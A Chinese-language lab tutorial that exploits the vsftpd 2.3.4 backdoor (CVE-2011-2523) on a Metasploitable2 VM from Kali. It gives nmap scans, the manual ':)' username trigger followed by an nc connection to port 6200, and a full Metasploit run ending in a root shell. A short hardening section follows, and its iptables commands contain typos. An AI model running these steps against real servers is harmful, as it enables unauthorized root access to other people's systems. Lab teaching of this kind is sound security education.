龙空技术网

划重点!纯干货了!FTP漏洞利用

黑掌team 522

前言:

今天小伙伴们对“地址ftp中ftp指什么”可能比较关怀,兄弟们都需要了解一些“地址ftp中ftp指什么”的相关资讯。那么小编在网上汇集了一些有关“地址ftp中ftp指什么””的相关资讯,希望小伙伴们能喜欢,我们快快来了解一下吧!

一、环境说明

靶机IP:虚拟机ip.149 系统:Metasploitable2-Linux FTP版本号:vsftpd 2.3.4

攻击IP : 虚拟机ip.151 系统:Kali-linux-2019

ip :指同一网段的ip,这里隐藏了。做这个实验保证ip同一段就OK。

二、FTP协议介绍

文件传输协议(英文:File Transfer Protocol,缩写:FTP)是用于在网络上进行文件传输的一套标准协议,使用客户/服务器模式。它属于网络传输协议的应用层。FTP使用21号端口。

用户分类:

Real用户Administrator匿名用户

FTP文件传输格式:

ASCII二进制格式三、匿名用户登录

1、确认靶机IP地址

root@kali:~# nmap ip.1/24...Nmap scan report for ip.149Host is up (0.00050s latency).Not shown: 977 closed portsPORT STATE SERVICE21/tcp open ftp22/tcp open ssh23/tcp open telnet25/tcp open smtp53/tcp open domain80/tcp open http111/tcp open rpcbind139/tcp open netbios-ssn445/tcp open microsoft-ds512/tcp open exec513/tcp open login514/tcp open shell1099/tcp open rmiregistry1524/tcp open ingreslock2049/tcp open nfs2121/tcp open ccproxy-ftp3306/tcp open mysql5432/tcp open postgresql5900/tcp open vnc6000/tcp open X116667/tcp open irc8009/tcp open ajp138180/tcp open unknownMAC Address: 00:0C:29:83:F3:95 (VMware)...

备注:截取扫描的部分信息,确认靶机的IP为ip.149

2、确认FTP的版本

root@kali:~# nmap -A ip.149...PORT STATE SERVICE VERSION21/tcp open ftp vsftpd 2.3.4|_ftp-anon: Anonymous FTP login allowed (FTP code 230)| ftp-syst: | STAT: | FTP server status:| Connected to ip.151| Logged in as ftp| TYPE: ASCII| No session bandwidth limit| Session timeout in seconds is 300| Control connection is plain text| Data connections will be plain text| vsFTPd 2.3.4 - secure, fast, stable|_End of status...

备注:

-A : 全扫描,扫描 OS版本、版本信息等

3、匿名用户登录

root@kali:~#nc ip.149 21220 (vsFTPd 2.3.4)USER anonymous331 Please specify the password.PASS 123230 Login successful.HELP214-The following commands are recognized. ABOR ACCT ALLO APPE CDUP CWD DELE EPRT EPSV FEAT HELP LIST MDTM MKD MODE NLST NOOP OPTS PASS PASV PORT PWD QUIT REIN REST RETR RMD RNFR RNTO SITE SIZE SMNT STAT STOR STOU STRU SYST TYPE USER XCUP XCWD XMKD XPWD XRMD214 Help OK.

USER/PASS 输入用户名(anonymous)/密码任意输入

通过匿名用户名,任意设置的密码成功登录靶机。

输入HELP查看,可以输入被识别的命令。

四、利用FTP后门漏洞

1、使用nmap扫描FTP后门漏洞

root@kali:~# nmap --script=vuln -p 21 ip.149Starting Nmap 7.80 (  ) at 2020-05-21 15:15 CSTNmap scan report for 192.168.72.149Host is up (0.00036s latency).PORT STATE SERVICE21/tcp open ftp|_clamav-exec: ERROR: Script execution failed (use -d to debug)| ftp-vsftpd-backdoor: | VULNERABLE:| vsFTPd version 2.3.4 backdoor| State: VULNERABLE (Exploitable)| IDs: CVE:CVE-2011-2523 BID:48539| vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.| Disclosure date: 2011-07-03| Exploit results:| Shell command: id| Results: uid=0(root) gid=0(root)| References:|    : MAC Address: 00:0C:29:83:F3:95 (VMware)Nmap done: 1 IP address (1 host up) scanned in 11.69 seconds

CVE : 公共漏洞和暴露

2、使用nc触发vsftpd-2.3.4后面漏洞

root@kali:~# nc ip.149 21220 (vsFTPd 2.3.4)USER user:)331 Please specify the password.PASS pass

另外打开一个终端利用该漏洞

root@kali:~# nc ip.149 6200iduid=0(root) gid=0(root)

nc已经成功登录靶机的bash,可以输入linux命令。

nc 靶机ip地址 端口号

vsftpd手工触发漏洞:当进行FTP认证时,如果用户名USER中包含:),那么直接就触发监听6200端口的连接的shell。

6200端口 默认没有开启的,从确认靶机IP的扫描信息就可以看出。

五、Metasploit实战:FTP漏洞利用

1、启动postgresql

root@kali:~# systemctl start postgresqlroot@kali:~# systemctl status postgresql postgresql.service - PostgreSQL RDBMS Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor p> Active: active (exited) since Thu 2020-05-21 15:22:14 CST; 15s ago Process: 6362 ExecStart=/bin/true (code=exited, status=0/SUCCESS) Main PID: 6362 (code=exited, status=0/SUCCESS)May 21 15:22:14 kali systemd[1]: Starting PostgreSQL RDBMS...May 21 15:22:14 kali systemd[1]: Finished PostgreSQL RDBMS.

systemctl start postgresql : 开启postgresql数据库

systemctl status postgresql :检测postgresql数据库的状态

2、使用Metasploit进行渗透

2.1 登录msfconsole控制台

root@kali:~# msfconsole

2.2 连接一个DB

msf5 > db_connect msf:123456@127.0.0.1/msf

连接metasploit的默认msf数据库,也可以自己创建数据库,连接自己创建的数据库。数据库记录探测的记录。

2.3 使用nmap探测目标FTP

msf5 > db_nmap -sV -p 21 ip.149[*] Nmap: Starting Nmap 7.80 (  ) at 2020-05-21 20:18 CST[*] Nmap: Nmap scan report for 192.168.72.149[*] Nmap: Host is up (0.00032s latency).[*] Nmap: PORT STATE SERVICE VERSION[*] Nmap: 21/tcp open ftp vsftpd 2.3.4[*] Nmap: MAC Address: 00:0C:29:83:F3:95 (VMware)[*] Nmap: Service Info: OS: Unix[*] Nmap: Service detection performed. Please report any incorrect results at  .[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 2.70 seconds

2.4 查看数据库探测记录

msf5 > servicesServices========host port proto name state info---- ---- ----- ---- ----- ----ip.149 21 tcp ftp open vsftpd 2.3.4

2.5 搜索漏洞代码

msf5 > search vsftpd 2.3.4Matching Modules================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/gather/teamtalk_creds normal No TeamTalk Gather Credentials 1 exploit/multi/http/oscommerce_installer_unauth_code_exec 2018-04-30 excellent Yes osCommerce Installer Unauthenticated Code Execution 2 exploit/multi/http/struts2_namespace_ognl 2018-08-22 excellent Yes Apache Struts 2 Namespace Redirect OGNL Injection 3 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution

2.6 设置payload相关配置

msf5 > use exploit/unix/ftp/vsftpd_234_backdoormsf5 exploit(unix/ftp/vsftpd_234_backdoor) > show optionsModule options (exploit/unix/ftp/vsftpd_234_backdoor): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 21 yes The target port (TCP)Exploit target: Id Name -- ---- 0 Automatic

2.7 设置靶机IP地址,查看设置是否成功

msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS ip.149RHOSTS => ip.149msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show optionsModule options (exploit/unix/ftp/vsftpd_234_backdoor): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS ip.149 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 21 yes The target port (TCP)Exploit target: Id Name -- ---- 0 Automatic

2.8 执行exploit攻击,获得Bash shell

msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit[*] ip.149:21 - Banner: 220 (vsFTPd 2.3.4)[*] ip.149:21 - USER: 331 Please specify the password.[+] ip.149:21 - Backdoor service has been spawned, handling...[+] ip.149:21 - UID: uid=0(root) gid=0(root)[*] Found shell.[*] Command shell session 1 opened (0.0.0.0:0 -> ip.149:6200) at 2020-05-21 15:53:08 +0800whoamiroot

验证是否登录了靶机的Bash shell。输入whoami命令,查看登录用户名为root。也可以输入其他命令。

六、FTP漏洞加固

1、修改系统FTP配置文档(/etc/vsftpd/vsftpd.conf),禁止匿名用户登录。

2、对特定漏洞进行打补丁,或者设置防火墙禁止连接后门端口。

iptables -A INPUT -p tcp -dport 6200 -j DROPiptabels -A OUTPUT -p tcp sport 6200 -j DROP

以上就是FTP漏洞利用的全部内容了,黑掌team每日持续更新网络安全内容,感兴趣的朋友可以点击关注或者前往微信公众号:黑掌 获取更多你想要的讯息。

标签: #地址ftp中ftp指什么